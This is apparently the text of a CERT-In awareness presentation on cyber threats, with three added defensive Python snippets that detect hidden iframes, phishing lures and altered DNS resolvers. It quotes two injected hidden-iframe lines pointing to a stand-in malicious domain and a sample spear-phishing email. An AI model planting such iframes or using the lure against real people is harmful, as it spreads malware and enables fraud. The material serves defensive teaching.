Cyber Security Threats Landscape - Cert-In
Cyber Security Threat Landscape
Bhupendra Singh Awasya, GCIH, GREM
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology, Department of Information Technology
Government of India
Topics of Discussion
• Cyber security incident trends
• Drive-by-download
• Watering hole attack
• Client side/Targeted attacks/RATs
• Mobile malware threats
• DNS Changer Malware
• Actions of Government
– Cyber Security Policy – Crisis Management
• Cyber security best practices – expectation from organizations
• Current challenges and way forward
Threats
Any circumstance or event that has the potential to cause harm to a system or network. That means that even the existence of an (unknown) vulnerability implies a threat by definition. [CERT]
An event, the occurrence of which could have an undesirable impact on the well-being of an asset. (ISC)2 International Information Systems Security Certification Consortium
A threat can be either:
• Intentional (i.e., intelligent; e.g., an individual cracker or a criminal organization)
• Accidental (e.g., the possibility of a computer malfunctioning, or the possibility of an "act of God" such as an earthquake, a fire, or a tornado)
• Or a circumstance: unintentional, by chance
Understanding Threats
• Employees • Malicious-intended persons • Ignorant users • Non-employees • Outside attackers • Natural disasters
• Disruption of service • Exposure of sensitive information • Alteration of information • Damage to information • Deletion of information • Funny jokes • Publicity, peer recognition • Monetary gain • Revenge/defaming others • Political means • Terrorism • Curiosity, testing skills/system
• Social engineering • Viruses, Trojan horses, worms • Key-loggers • Exploitation of vulnerabilities • Packet replay • Packet modification • IP spoofing • Mail bombing • Various hacking tools • Password cracking • Cross-site scripting • SQL injection
• Transmission threats – Eavesdropping/sniffing – DoS/DDoS – Covert channels – Spoofing – Tunneling – Masquerading/man-in-the-middle attacks
• Malicious code threats – Viruses – Worms – Trojans – Spyware/adware – Logic bombs – Backdoors – Bots
• Password threats – Password crackers
• Social engineering – Dumpster diving – Impersonation – Shoulder surfing
• Physical threats – Physical access – Spying
• Application threats – Buffer overflows – SQL injection – Cross-site scripting
• Improper usage/unauthorized access – Hackers – Grey hats, white hats, black hats – Internal intruders – Defacement – Open proxy/spam – Phishing
• Other threats – Mobile code
Classification of Information Security Threats
National level
• Cyber terrorism • Attacks on critical infrastructure • Web defacement • Website intrusion and malware propagation • Malicious code • Scanning and probing • Denial of Service & Distributed Denial of Service • Cyber espionage
Organisational level
• Website intrusion/defacement • Domain stalking • Malicious code • Scanning and probing • Denial of Service & Distributed Denial of Service • Targeted attacks • Phishing • Data theft • Insider threats • Financial frauds
Individual level
• Social engineering • Email hacking & misuse • Identity theft & phishing • Financial scams • Abuse through emails • Abuse through social networking sites • Laptop theft
Cyber threats
A few years ago (2006 and earlier): “No one ever thought of spreading malware via legitimate websites.”
Drive-by-download
• Downloads which a person authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).
• Any download that happens without a person's knowledge.
• Download of spyware, a computer virus or any kind of malware that happens without a person's knowledge.
Unintended download of computer software from the Internet – the attack flow (attacker, legitimate website, malicious website, legitimate user's system):
1.1 Attacker creates a malicious website
1.2 Attacker infects a legitimate website
2 User requests the legitimate website
3 Website response includes the malicious code
4 User's browser requests content from the malicious website
5 Malicious website successfully delivers malware/virus
Malware authors are shifting their focus from traditional desktop-based attack methodology to the new, emerging, dynamic and user-interactive web applications for spreading malware.
Watering Hole Attack
Watering hole is a computer attack strategy identified in 2012 by RSA.
• The “watering hole” attack consists of injecting malicious code into the public web pages of a site that the targets are known to visit.
• The attacker wants to target a particular group (organization, industry, or region). The attack consists of three phases:
– Guess (or observe) which websites the group often uses.
– Infect one or more of these websites with malware.
– Eventually, some member of the targeted group will get infected.
Initially exploited an Internet Explorer zero-day vulnerability
Why are attackers using this?
In this attack vector, attackers compromise a legitimate website and plant a piece of malicious code in it, which is then served to all legitimate users of that website.
How do they do it?
• Web defacement
– Exploitation of application vulnerabilities (Joomla, PHP, ASP, JSP, cPanel vulnerabilities, etc.)
– SQL injection – RFI/LFI – Hacking of (admin) credentials – Web shells
• Website intrusion and malware propagation
– SQL injection (automated) – Asprox botnet – Gumblar (stolen FTP credentials) – Toolkits: Mpack, Neosploit, Luckysploit, Phoenix, Crimepack, etc.
Once the malware/virus is planted on the user's computer, a remote attacker/hacker can:
- Access the infected computer
- Steal user credentials, banking or other passwords
- Use it as a launching pad for further attacks
- Install more sophisticated malware/viruses
- Gain a chain of access to corporate networks (via VPN etc.) that the user or the user's system is allowed to reach
Typical injected code – an iframe loading content from the attacker's domain, hidden either by zero size or by CSS (two variants):
<iframe src="http://malicious.domain/" width=0 height=0></iframe>
<iframe src="http://malicious.domain/" style="visibility:hidden;position:absolute"></iframe>
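A defender-side check for the injected iframe pattern shown above, added here as an example and not part of the original presentation: it parses a page with Python's html.parser and reports iframes that are zero-sized or hidden by CSS (it also treats display:none as hidden, a generalization of the slide's variant). The sample HTML and the domain malicious.example are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a page into which two hidden iframes have been injected
# next to a legitimate, visible embed. malicious.example is a placeholder.
SAMPLE_HTML = """
<html><body>
<h1>Company news</h1>
<iframe src="http://malicious.example/" width=0 height=0></iframe>
<iframe src="http://malicious.example/x" style="visibility:hidden;position:absolute"></iframe>
<iframe src="https://www.example.org/embed/1" width="560" height="315"></iframe>
</body></html>
"""

# CSS that makes an element invisible (display:none added as a generalisation
# of the visibility:hidden form shown on the slide).
HIDDEN_STYLE = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)


def is_hidden_iframe(attrs):
    """True when an <iframe>'s attributes give it zero size or hide it via CSS."""
    a = {name.lower(): (value or "").strip() for name, value in attrs}
    for dim in ("width", "height"):
        if a.get(dim, "").rstrip("px") == "0":
            return True
    return bool(HIDDEN_STYLE.search(a.get("style", "")))


class HiddenIframeScanner(HTMLParser):
    """Collects the src of every hidden iframe seen while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe" and is_hidden_iframe(attrs):
            self.findings.append(dict(attrs).get("src", ""))


def find_hidden_iframes(html):
    """Return the src values of all hidden iframes in the given HTML."""
    scanner = HiddenIframeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe ->", src)
```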
Stolen admin credentials
Another popular vector, other than SQL injection and cross-site scripting, is stealing FTP service credentials.
Most websites have their content managed via FTP uploads.
Gumblar
Gumblar performs the following tasks:
- Stealing FTP credentials
- Sending spam
- Installing fake anti-malware
- Google search/query hijacking
- Disabling security software like desktop firewalls and antivirus
Attackers can:
- Use URL shortening services like http://tinyurl.com/ or http://bit.ly/ for hiding the actual URL
- Upload malicious code embedded in documents (PDF, DOC, XLS, SWF, PPT)
- Place iframe or JavaScript code in comment fields
Social engineering
• How does an unwitting user become more "social"?
“Social engineering is the act of manipulating people into performing actions or divulging confidential information.”
• Intentions:
– Phishing/financial frauds – Malware propagation – Nigerian (419) scams
Social engineering scams
– Advance fee fraud/Nigerian (419) scams
• The term "419" refers to the article of the Nigerian Criminal Code ("Obtaining Property by false pretences; Cheating") dealing with fraud
• Variants
– Purchasing goods and services – Check cashing – Lottery scam – Fake job offer – Beneficiary of a will – Charity scams – Friend/lost wallet scam – Fraud recovery scams – and many, many more…
Phishing
• The term phishing is derived from ‘fishing’: password + fishing = phishing
“Phishing is the act of sending a communication (email/message/fax/SMS) to a user, falsely claiming to be a legitimate enterprise/brand, in an attempt to scam the unsuspecting user into disclosing sensitive private information that will be used for identity theft.”
Attack on client side software
• PDF reader/Flash
• Microsoft Office applications
• Takes place normally via an interesting and relevant email, in the local language, with Microsoft Office/PDF attachments. The file can also be hosted on a website and the victim lured into opening it.
• Designed to target a specific individual or organisation
• Aim is to extract sensitive/valuable information
Attack tool kits – Vulnerabilities exploited
Source: Exploitkits overview - Kaspersky Labs
Targeted attacks - example
From: Sr Manager [mailto:[email protected]]
Sent: Tuesday, 19 January, 2010 5:14 PM
To: [email protected]
bcc: [email protected], [email protected]
Subject: Urgent document for agenda items for the coming meeting

Dear Mr. (Target)
I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected, the password for the attached file is:- “abc123”. Please have a look and send your comments and input material to me ASAP.
Regards
Ram Mathur
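A mail-gateway heuristic for the lure pattern in the example above (a password-protected attachment with the password handed over in the body, plus urgency wording), added here as an illustration and not part of the presentation. The message below is constructed, with placeholder addresses on the reserved .invalid domain and a placeholder attachment.

```python
import email
import re
from email import policy

# Constructed sample modelled on the lure on the slide; addresses and the
# attachment bytes are placeholders, not taken from any real incident.
SAMPLE_EMAIL = """\
From: Sr Manager <sr.manager@example.invalid>
To: target@example.invalid
Subject: Urgent document for agenda items for the coming meeting
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Dear Mr. Target,
I am attaching the agenda items for the board meeting. For confidentiality
reasons the attached file is password protected, the password is:- "abc123".
Please have a look and send your comments to me ASAP.

--b1
Content-Type: application/zip; name="agenda.zip"
Content-Disposition: attachment; filename="agenda.zip"
Content-Transfer-Encoding: base64

UEsDBAo=
--b1--
"""

# "password ... is: xyz" phrases give the reader the key to open an attachment
# that the gateway's scanner could not inspect.
PASSWORD_IN_BODY = re.compile(r"password[^\n]{0,40}?\bis\s*[:\-]+", re.I)
URGENCY = re.compile(r"\b(urgent|asap|immediately)\b", re.I)


def lure_indicators(raw_message):
    """Return the attachment names found and the lure indicators that fired."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    attachments = [p.get_filename() or "" for p in msg.iter_attachments()]
    flags = []
    if attachments and PASSWORD_IN_BODY.search(body):
        flags.append("password_for_attachment_in_body")
    if URGENCY.search(msg.get("Subject", "") + " " + body):
        flags.append("urgency_language")
    return {"attachments": attachments, "flags": flags}


if __name__ == "__main__":
    print(lure_indicators(SAMPLE_EMAIL))
```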
BlackHat SEO / SEO poisoning
BlackHat SEO is a maliciously motivated search engine optimization technique that takes advantage of search engine functionality to promote malicious websites to the top of search results.
• How can a search be poisoned? Typically the attackers upload PHP scripts to the compromised sites. The scripts query Google’s trending topic service and then generate relevant HTML for the hottest search terms.
– Campaigns seen: holidays, sales events, natural disasters, much anticipated product announcements, sporting events, celebrity gossip, TV shows, and popular toys.
Recent trends show that Google Image indexes are also being poisoned.
Rogue software for Mac OS X
• MAC Defender
– http://www.cert-in.org.in/s2cMainServlet?pageid=PUBVA01&VACODE=CIVA-2011-1185
Most popular technique for identity theft seen: the message offers a “spectacular video” or claims “you appear in this clip”. The bait normally comes from the profile of a friend whose account has already been hacked.
Users typically receive a message (which appears to be genuine) suggesting the recipient clicks a link for one reason or another. In most cases, the message offers a “spectacular video” or claims “you appear in this clip”, or uses other catchy themes so the recipient is lured easily, and normally includes the user name of the recipient.
Malware through Facebook
• Links to malicious sites
• Geo-aware attack toolkit – malware delivered only to a few countries
• Facebook likejacking
DNS Changer Malware
• 4 million computers infected.
• Exploited default usernames/passwords in DSL routers and also used other malware like Koobface to spread.
• The malware hijacks the domain name system (DNS) settings on infected systems.
• The FBI shut down the operation and used temporary servers to give people time to fix the problem and still use their computers.
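The defender-side check that the DNS Changer case calls for, added here as an example and not part of the presentation: audit a host's configured resolvers against the list the organisation actually operates, and flag any that were silently changed. The resolv.conf text, the approved resolver list and the 10.0.0.0/8 internal range are all constructed assumptions; 203.0.113.9 comes from the documentation address range and is not a real indicator.

```python
import ipaddress

# Constructed sample in resolv.conf syntax. 10.0.0.53 is the organisation's own
# resolver; 203.0.113.9 stands in for a resolver inserted behind the user's back.
SAMPLE_RESOLV_CONF = """
# Generated by DHCP client
search corp.example
nameserver 10.0.0.53
nameserver 203.0.113.9
options timeout:2
"""

# Assumed: resolvers the organisation operates, and its internal address space.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
ORG_NETWORKS = [ipaddress.ip_network("10.0.0.0/8")]


def parse_nameservers(text):
    """Return the nameserver addresses from resolv.conf-style text, in order."""
    servers = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        parts = line.split()
        if len(parts) == 2 and parts[0] == "nameserver":
            try:
                servers.append(str(ipaddress.ip_address(parts[1])))
            except ValueError:
                continue                         # ignore malformed entries
    return servers


def audit_resolvers(text, approved=APPROVED_RESOLVERS, networks=ORG_NETWORKS):
    """Map every resolver not on the approved list to a reason string.

    A non-empty result is the kind of change DNSChanger made: names still
    resolve, but through a server the organisation never configured.
    """
    findings = {}
    for ip in parse_nameservers(text):
        if ip in approved:
            continue
        addr = ipaddress.ip_address(ip)
        inside = any(addr in net for net in networks)
        findings[ip] = ("unapproved resolver inside org network" if inside
                        else "resolver outside org network")
    return findings


if __name__ == "__main__":
    for ip, why in audit_resolvers(SAMPLE_RESOLV_CONF).items():
        print(ip, "-", why)
```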
Mobile Threats
• The mobile counterparts: Zitmo (Zeus In The Mobile), Spitmo (SpyEye In The Mobile), Carberp
• Present across almost all the major platforms (Android, Symbian, BlackBerry)
Quick Response Code (QR Code)
Use your tablet or phone camera to scan this image to visit our website!
• Visit our website @ [QR code image]
What if the QR code was set up by an attacker, e.g. using the Social-Engineer Toolkit (SET), to launch an attack?
Web-Application Attacks
• Low-hanging fruit – in-house developed websites (“Develop your website for just Rs. 500/-”).
• “75% of all attacks occurring at application layer”—Gartner
• “8 out of 10 websites are vulnerable to attack”—WhiteHat Security Team
• Web apps account for 80 percent of internet vulnerabilities
Attacks
• Cross Site Scripting (XSS) • SQL Injection • Cross Site Request Forgery (XSRF) • Malicious File Upload • Remote File Inclusion (RFI) • Command Injection … & more
Botnet trends - India
[Chart: monthly botnet counts in India, Jan 2008 to Dec 2010 (y-axis 0 to 2,500,000); series: Conficker, Mariposa]
[Chart: Botnet trends (Top 20 Infection) India (2011); families listed: torpig, dnschanger, mebroot, Ponmocup, Gozi, spam, ZeuS, TDSS, Artro, SpyEye, irc, DDoS.DirtJumper, Carberp, Gbot, honeypot, Oficla, pushdo, Ramnit, DDoS_DirtJumper, DDoS.Armageddon]
[Chart: Botnet trends – October 2013; families listed: ZeroAccess, pushdo, Sality_Virus, zeus, spam, Pushdo_Spambot, GameOver_Zeus, zeus-p2p, Beebone, grum, torpig, slenfbot.5050, Neurevt, DDoS_DirtJumper, Virut_botnet, Pony, blackenergy, Ransomware, Dofoil, TDSS, KeySpy]
Attack tool kits
• Web attacker
• Mpack, Fragus
• Neosploit, Luckysploit, Icepack
• Blackhole, Eleonore
• Zeus
– Random registry keys (RC4 encryption); multiple compromises of a victim by different attackers using the same kit – difficult to clean
• Mariposa – HTTP POST stealing, blended defense mechanisms
• SpyEye – competes with Zeus
6 Levels of simultaneous action
• Government – Policy, Plan, IT Act, Directives, CMP
• Public–Private Partnership – Joint Working Group
• Technical – Honeypots, sensors, situational awareness, R&D
• CIIP and CERT – Section 70A and 70B of IT Act
• Individual/Professional – Awareness & capacity building
• International – Information sharing and cooperation
Security of Cyber Space – Snap shot of efforts
8 Frameworks for focused action
• Enabling legal framework
• Cyber security assurance framework (product, process, technology and people)
• Alert and advisory framework – Network of National CERT and sectoral CERTs
• Capacity building framework – training & awareness and skilled manpower
• Critical Information Infrastructure Protection (CIIP)
• Cyber security research and development
• Information sharing and cooperation framework – National and International
• Public private partnership (JWG)
Actions at organisational level
• Security policies and procedures
• CSIRT/CISO/Administrator/Users
• Multi-layered defense mechanism
– Network behavior analysis – Perimeter defense – Security Information and Event Management – Database Activity Monitoring
• Updated/patched applications
• Host-based Intrusion Prevention System
• Content inspection systems/DPI at perimeter, DLP
• Pre-defined procedures for information sharing
• Authentication & authorisation to secure information and prevent data leakage
• Authentication of emails (digital signatures)
• Auditing and pentest
• User awareness
Way forward …
• Fostering collaboration between Government and Industry
• Implementation of security best practices based on global standards
• Use of validated and certified IT products and devices
– India is an Authorizing Nation under Common Criteria Recognition Arrangement (CCRA)
• Creation of mechanisms for auditing of Industrial Control systems and associated IT systems and Empanelment of ICS Auditors
• Secure application / software development process
• Information exchange on vulnerabilities and threats in trusted manner
• Creation of Incident Response teams at entity level
• Capacity building
• Mock drills for improving security posture of CII including simulated attacks on ICS devices
Thank you
Incident Response Helpdesk
Phone: 1800 11 4949
FAX: 1800 11 6969
e-mail: [email protected]
http://www.cert-in.org.in